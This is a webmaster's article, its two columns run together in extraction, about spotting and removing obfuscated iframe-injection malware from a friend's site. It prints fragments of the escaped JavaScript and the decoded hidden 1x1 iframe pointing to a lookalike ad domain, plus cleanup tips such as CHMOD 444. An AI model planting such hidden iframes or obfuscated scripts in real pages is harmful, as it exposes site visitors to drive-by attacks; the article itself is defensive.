| I have written several popular articles on iframe | | | | //--> |
| injections which you can read by visiting: | | | | [/Script] |
| The people who implemented my suggestions, | | | | Researching the issue further I found a website that |
| reported they had quite a bit of success in avoiding | | | | was able to deobfuscate, or decrypt, the code at: |
| these malicious iframe injection attacks. Their websites | | | | What you do is copy only the obsfuscated code as |
| were now safe and their traffic was continuous. | | | | shown below: |
| I had a friend who was a victim of these iframe | | | | 72%61%6D%65%3E |
| injection attacks. When I tested his site, all tests | | | | You then paste the code into the form box they |
| indicated that his site was clean, but yet I knew this | | | | provide and then click on "Deobfuscate". |
| could not be the case. I checked all his index.* files and | | | | The following was the resulting malicious iframe |
| could not find any obvious hidden iframes. What I did | | | | injection code: |
| notice was some codes that were obuscated that my | | | | [iframe src= http: //goooogleadsence.biz/_click=8F9DA |
| friend had no explanation for. | | | | width=1 height=1 style= visibility:hidden;position:absolute ][ |
| Obfuscation is the concealment of meaning in | | | | iframe] |
| communication, making communication confusing, | | | | By completely removing the obfuscated (escaped) |
| intentionally ambiguous, and more difficult to interpret. It | | | | javascript code, my friend's website was clean and |
| is basically a form of encryption. The web page is not | | | | safe again. |
| really encrypted, or else the web page would not | | | | If you implement my suggestions, particulariy the |
| display when accessed. The web browser can tell the | | | | CHMOD 444, after an iframe injection attack, and are |
| difference between this encrypted code and regular | | | | fairly sure your website is clean, then chances are you |
| HTML, but the human eye cannot decipher the | | | | may not be a victim of iframe injection obfuscated |
| encrypted code. | | | | (escaped) javascript code. One must not forget |
| Upon further investigation, I found that compromised | | | | though, that no website will ever be 100% secure |
| websites can be infected with hidden iframes and/or | | | | which is why we must always practise preventative |
| with obfuscated(escaped)javascript code. My friend's | | | | measures. |
| website appeared to be a victim of this obfuscated | | | | It is also important to remember that not all iframes are |
| iframe injection. | | | | bad. Before you remove a suspected iframe, make |
| The following was the suspected malicious iframe | | | | sure it is not relevant to your web page. You might |
| injection obfuscated code: | | | | want to download a copy of the web page before |
| [Script Language='Javascript'] | | | | you do any deleting just to be sure if your are not |
| 1D%3E%3C%2F%69%66%72%61%6D%65%3E')); | | | | certain. |